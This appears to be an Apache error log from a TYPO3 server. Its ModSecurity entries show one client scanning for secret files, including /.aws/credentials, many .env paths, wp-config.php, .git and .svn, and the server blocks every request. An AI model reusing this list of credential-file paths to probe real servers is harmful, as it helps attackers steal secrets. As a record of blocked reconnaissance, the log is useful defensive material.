[Tue May 13 22:09:23.346009 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCOm80ek2plj21rmDsm9vAAAABA"]
[Tue May 13 22:09:23.346204 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCOm80ek2plj21rmDsm9vAAAABA"]
[Tue May 13 22:09:23.672586 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue May 13 22:09:23.702029 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.yaml
[Tue May 13 22:09:23.780587 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Tue May 13 22:09:23.810610 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aCOm80ek2plj21rmDsm9xgAAABA"]
[Tue May 13 22:09:23.810877 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aCOm80ek2plj21rmDsm9xgAAABA"]
[Tue May 13 22:09:23.811063 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aCOm80ek2plj21rmDsm9xgAAABA"]
[Tue May 13 22:09:26.549275 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aCOm9kek2plj21rmDsm9xwAAABA"]
[Tue May 13 22:09:26.549530 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aCOm9kek2plj21rmDsm9xwAAABA"]
[Tue May 13 22:09:26.549741 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aCOm9kek2plj21rmDsm9xwAAABA"]
[Tue May 13 22:09:26.810134 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aCOm9kek2plj21rmDsm9ywAAABA"]
[Tue May 13 22:09:26.810527 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aCOm9kek2plj21rmDsm9ywAAABA"]
[Tue May 13 22:09:26.810704 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aCOm9kek2plj21rmDsm9ywAAABA"]
[Tue May 13 22:09:26.840117 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.bak
[Tue May 13 22:09:26.919775 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aCOm9kek2plj21rmDsm9zgAAABA"]
[Tue May 13 22:09:26.920030 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aCOm9kek2plj21rmDsm9zgAAABA"]
[Tue May 13 22:09:26.920218 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aCOm9kek2plj21rmDsm9zgAAABA"]
[Tue May 13 22:09:29.681637 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aCOm-Uek2plj21rmDsm90gAAABA"]
[Tue May 13 22:09:29.682030 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aCOm-Uek2plj21rmDsm90gAAABA"]
[Tue May 13 22:09:29.682284 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aCOm-Uek2plj21rmDsm90gAAABA"]
[Tue May 13 22:09:29.711777 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "aCOm-Uek2plj21rmDsm90wAAABA"]
[Tue May 13 22:09:29.712022 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "aCOm-Uek2plj21rmDsm90wAAABA"]
[Tue May 13 22:09:29.712229 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "aCOm-Uek2plj21rmDsm90wAAABA"]
[Tue May 13 22:09:29.741340 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue May 13 22:09:31.921339 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "aCOm-0ek2plj21rmDsm91QAAABA"]
[Tue May 13 22:09:31.922432 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "aCOm-0ek2plj21rmDsm91QAAABA"]
[Tue May 13 22:09:31.922635 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "aCOm-0ek2plj21rmDsm91QAAABA"]
[Tue May 13 22:09:31.957031 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue May 13 22:09:31.986488 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue May 13 22:09:32.042501 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue May 13 22:09:32.084131 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Tue May 13 22:09:32.278409 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aCOm_Eek2plj21rmDsm93QAAABA"]
[Tue May 13 22:09:32.278677 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aCOm_Eek2plj21rmDsm93QAAABA"]
[Tue May 13 22:09:32.278859 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aCOm_Eek2plj21rmDsm93QAAABA"]
[Tue May 13 22:09:32.361567 2025] [php:error] [pid 3133909] [client 154.83.103.115:12604] script '/var/www/surf/TYPO3/public/typo3conf/localconf.php' not found or unable to stat
[Tue May 13 22:09:32.486013 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Tue May 13 22:09:32.724418 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Tue May 13 22:09:33.334367 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aCOm_Uek2plj21rmDsm97QAAABA"]
[Tue May 13 22:09:33.334629 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aCOm_Uek2plj21rmDsm97QAAABA"]
[Tue May 13 22:09:33.334835 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aCOm_Uek2plj21rmDsm97QAAABA"]
[Tue May 13 22:09:33.545682 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Tue May 13 22:09:33.727812 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "aCOm_Uek2plj21rmDsm98AAAABA"]
[Tue May 13 22:09:33.728057 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "aCOm_Uek2plj21rmDsm98AAAABA"]
[Tue May 13 22:09:33.728242 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "aCOm_Uek2plj21rmDsm98AAAABA"]
[Tue May 13 22:09:36.896240 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aCOnAEek2plj21rmDsm99AAAABA"]
[Tue May 13 22:09:36.896512 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aCOnAEek2plj21rmDsm99AAAABA"]
[Tue May 13 22:09:36.896707 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aCOnAEek2plj21rmDsm99AAAABA"]
[Tue May 13 22:09:36.981819 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Tue May 13 22:09:40.407374 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCOnBEek2plj21rmDsm9-gAAABA"]
[Tue May 13 22:09:40.407635 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCOnBEek2plj21rmDsm9-gAAABA"]
